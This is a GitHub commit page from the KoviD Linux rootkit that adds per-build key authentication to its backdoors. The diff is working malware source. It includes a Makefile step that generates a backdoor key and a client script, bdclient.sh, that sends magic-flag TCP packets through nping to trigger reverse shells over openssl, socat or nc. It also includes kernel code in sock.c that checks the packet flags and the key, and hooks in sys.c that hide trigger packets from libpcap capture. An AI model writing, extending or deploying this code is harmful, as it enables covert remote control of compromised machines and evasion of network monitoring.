Skip to content

Commit

Permalink
Add simple key auth for backdoors
Browse files Browse the repository at this point in the history
A new key is generated everytime KoviD is compiled.

At the end of compilation:

Backdoor KEY: <KEY>

Run bdclient.sh like, e.g.:

$ sudo ./bdclient.sh socat <IP> <PORT> <Backdoor KEY>
  • Loading branch information
JNE committed Oct 31, 2024
1 parent 84ccdb1 commit f8a08bc
Show file tree
Hide file tree
Showing 6 changed files with 51 additions and 24 deletions.
4 changes: 4 additions & 0 deletions Makefile
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,7 @@ AS=$(shell which as)
CTAGS=$(shell which ctags))
JOURNALCTL := $(shell which journalctl)
UUIDGEN := $(shell uuidgen)
BDKEY := $(shell echo "0x$$(od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n')")

# TODO: Check if we can generate a random PROCNAME, something like:
# PROCNAME ?= $(shell uuidgen | cut -c1-8)
Expand Down Expand Up @@ -44,7 +45,10 @@ obj-m := ${OBJNAME}.o
CC=gcc

all: persist
sed -i 's/^#define BDKEY .*/#define BDKEY $(BDKEY)/' src/bdkey.h
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
@echo -n "Backdoor KEY: "
@echo $(BDKEY) | sed 's/^0x//'

persist:
sed -i "s|.lm.sh|${UUIDGEN}.sh|g" $(persist).S
Expand Down
18 changes: 9 additions & 9 deletions scripts/bdclient.sh
Original file line number Diff line number Diff line change
Expand Up @@ -62,16 +62,16 @@ usage="Use: [V=1] ./${0##*/} <method> <IP> <PORT>
Local port for connect-back session - must be unfiltered
Example:
./${0##*/} openssl 192.168.1.10 9999
./${0##*/} openssl 192.168.1.10 9999 <Backdoor KEY>
Verbose, example:
V=1 ./${0##*/} openssl 192.168.1.10 9999
V=1 ./${0##*/} openssl 192.168.1.10 9999 <Backdoor KEY>
Connect to GIFT address instead of this machine:
GIFT=192.168.0.30 ./${0##*/} openssl 192.168.1.10 443
GIFT=192.168.0.30 ./${0##*/} openssl 192.168.1.10 443 <Backdoor KEY>
If used alongside with GIFT, DRY(run) will NOT send KoviD instruction and will show client's command:
DRY=true GIFT=192.168.0.30 ./${0##*/} openssl 192.168.1.44 444"
DRY=true GIFT=192.168.0.30 ./${0##*/} openssl 192.168.1.44 444 <Backdoor KEY>"


errexit() {
Expand All @@ -91,7 +91,7 @@ check_util() {
done
} >&2

if [[ "$#" -ne 3 ]]; then
if [[ "$#" -ne 4 ]]; then
errexit "Missing parameter" true 1
fi

Expand Down Expand Up @@ -130,7 +130,7 @@ case $1 in
[[ ! -n "$V" ]] && exec &>/dev/null
# shellcheck disable=SC2086
"$NPING" "$1" $GIFT --tcp -p "$RR_OPENSSL" --flags Ack,rSt,pSh \
--source-port "$2" -c 1
--source-port "$2" --data="$3" -c 1
}
[[ "$DRY" == false ]] && f "$@" &
pushd "$PERMDIR" >/dev/null && {
Expand All @@ -147,7 +147,7 @@ case $1 in
[[ ! -n "$V" ]] && exec &>/dev/null
# shellcheck disable=SC2086
"$NPING" "$1" $GIFT --tcp -p "$RR_SOCAT" --flags Fin,Urg,aCK \
--source-port "$2" -c 1
--source-port "$2" --data="$3" -c 1
}
[[ "$DRY" == false ]] && f "$@" &
pushd "$PERMDIR" >/dev/null && {
Expand All @@ -163,7 +163,7 @@ case $1 in
[[ ! -n "$V" ]] && exec &>/dev/null
# shellcheck disable=SC2086
"$NPING" "$1" $GIFT --tcp -p "$RR_NC" --flags Ack,rSt,pSh \
--source-port "$2" -c 1
--source-port "$2" --data="$3" -c 1
}
[[ "$DRY" == false ]] && f "$@" &
listen "$NC" -lvp "$2"
Expand All @@ -177,7 +177,7 @@ case $1 in
[[ ! -n "$V" ]] && exec &>/dev/null
# shellcheck disable=SC2086
"$NPING" "$1" $GIFT --tcp -p "$RR_SOCAT_TTY" --flags Cwr,Urg,fiN,rsT \
--source-port "$2" -c 1
--source-port "$2" --data="$3" -c 1
}
[[ "$DRY" == false ]] && f "$@" &
pushd "$PERMDIR" >/dev/null && {
Expand Down
11 changes: 11 additions & 0 deletions src/bdkey.h
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
/**
* BDKEY generated by Makefile
* DO NOT EDIT
*
*/
#ifndef __BDKEY_H
#define __BDKEY_H

#define BDKEY 0x0000000000000000

#endif
2 changes: 1 addition & 1 deletion src/lkm.h
Original file line number Diff line number Diff line change
Expand Up @@ -122,7 +122,7 @@ bool kv_sock_start_fw_bypass(void);
void kv_sock_stop_sniff(struct task_struct *tsk);
void kv_sock_stop_fw_bypass(void);
bool kv_bd_search_iph_source(__be32 saddr);
bool kv_check_cursing(struct tcphdr *);
bool kv_check_bdkey(struct tcphdr *, struct sk_buff *);
void kv_bd_cleanup_item(__be32 *);

/** proc handling */
Expand Down
36 changes: 24 additions & 12 deletions src/sock.c
Original file line number Diff line number Diff line change
Expand Up @@ -20,6 +20,7 @@
#include "fs.h"
#include "lkm.h"
#include "log.h"
#include "bdkey.h"

static LIST_HEAD(iph_node);
struct iph_node_t {
Expand Down Expand Up @@ -425,21 +426,32 @@ static int _bd_watchdog(void *t)
#endif
}

/**
* if TCP flags are:
* FUCK, CUNT or ASS then you know...
*/
bool kv_check_cursing(struct tcphdr *t) {
uint8_t fuckoff = 0;
bool kv_check_bdkey(struct tcphdr *t, struct sk_buff *skb) {
uint8_t silly_word = 0;
enum { FUCK=0x8c, CUNT=0xa5, ASS=0x38 };

fuckoff = t->fin << 7| t->syn << 6| t->rst << 5| t->psh << 4|
silly_word = t->fin << 7| t->syn << 6| t->rst << 5| t->psh << 4|
t->ack << 3| t->urg << 2| t->ece <<1| t->cwr;

//sudo nping <IP> --tcp -p <dst port> --flags <flag1,flag2,...> --source-port <reverse shell port> -c 1
if (fuckoff == FUCK || fuckoff == CUNT || fuckoff == ASS)
return true;

if (silly_word == FUCK || silly_word == CUNT || silly_word == ASS)
{
uint64_t address_value = 0;
unsigned long a = BDKEY;
unsigned char *data = skb->data + 40;

if (skb->len >= sizeof(struct tcphdr) + sizeof(struct iphdr) + 8) {
address_value = ((unsigned long)data[0] << 56) |
((unsigned long)data[1] << 48) |
((unsigned long)data[2] << 40) |
((unsigned long)data[3] << 32) |
((unsigned long)data[4] << 24) |
((unsigned long)data[5] << 16) |
((unsigned long)data[6] << 8) |
(unsigned long)data[7];
if (address_value == BDKEY)
return true;
}
}
return false;
}

Expand All @@ -460,7 +472,7 @@ static unsigned int _sock_hook_nf_cb(void *priv, struct sk_buff *skb,
int dst = _check_bdports(htons(tcph->dest));

/** Silence libpcap on CUNT/ASS/FUCK */
if (dst == RR_NULL || !kv_check_cursing(tcph)) break;
if (dst == RR_NULL || !kv_check_bdkey(tcph, skb)) break;

kf = kzalloc(sizeof(struct kfifo_priv), GFP_KERNEL);
if (!kf) {
Expand Down
4 changes: 2 additions & 2 deletions src/sys.c
Original file line number Diff line number Diff line change
Expand Up @@ -659,7 +659,7 @@ static int m_packet_rcv(struct sk_buff *skb, struct net_device *dev,
return 0;
else {
struct tcphdr *tcp = (struct tcphdr*)skb_transport_header(skb);
if (kv_check_cursing(tcp))
if (kv_check_bdkey(tcp,skb))
return 0;
}
}
Expand All @@ -680,7 +680,7 @@ static int m_tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
return 0;
else {
struct tcphdr *tcp = (struct tcphdr*)skb_transport_header(skb);
if (kv_check_cursing(tcp))
if (kv_check_bdkey(tcp,skb))
return 0;
}
}
Expand Down

0 comments on commit f8a08bc

Please sign in to comment.